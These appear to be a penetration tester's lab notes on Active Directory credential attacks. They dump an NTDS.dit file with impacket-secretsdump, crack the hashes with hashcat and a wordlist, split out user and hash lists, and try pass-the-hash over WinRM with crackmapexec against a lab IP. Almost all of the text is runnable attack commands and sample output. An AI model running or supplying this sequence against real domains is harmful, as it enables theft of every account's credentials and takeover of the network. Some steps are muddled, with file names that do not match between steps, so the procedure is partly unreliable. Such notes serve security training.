This use case is for the situation that you have access to an NTDS.dit file.
- This file is essentially the database that holds all AD users, hashes, objects, etc.
- As a result, it is a gold mine and its secrets can be dumped via secretsdump.
First, dump the NTDS.dit database file with secretsdump:
impacket-secretsdump -ntds ntds.dit -system SYSTEM -sam SAM LOCAL | tee secrets
Next, copy the Kerberos portion of the dump and put it in a file called secrets.txt (replace/overwrite as needed).
After, we can then attempt to crack with Hashcat:
.\hashcat.exe -m 1000 hashes.txt .\rockyou.txt
.\hashcat.exe hashes.txt .\rockyou.txt
- We can attempt a Pass-The-Hash attack
- First, we need to separate the users and hashes into two different files
users.txt:
cat secrets | cut -d":" -f1 | tee users.txt
cat users.txt
Administrator
Guest
RESOURCEDC$
krbtgt
M.Mason
K.Keen
L.Livingstone
J.Johnson
V.Ventz
S.Swanson
P.Parker
R.Robinson
D.Durant
G.Goldberg
- We now have a neat list of users
hashes.txt:
cat secrets | cut -d":" -f4 | tee hashes.txt
- We now have a neat list of hashes
crackmapexec winrm 192.168.81.175 -u users.txt -H hashes.txt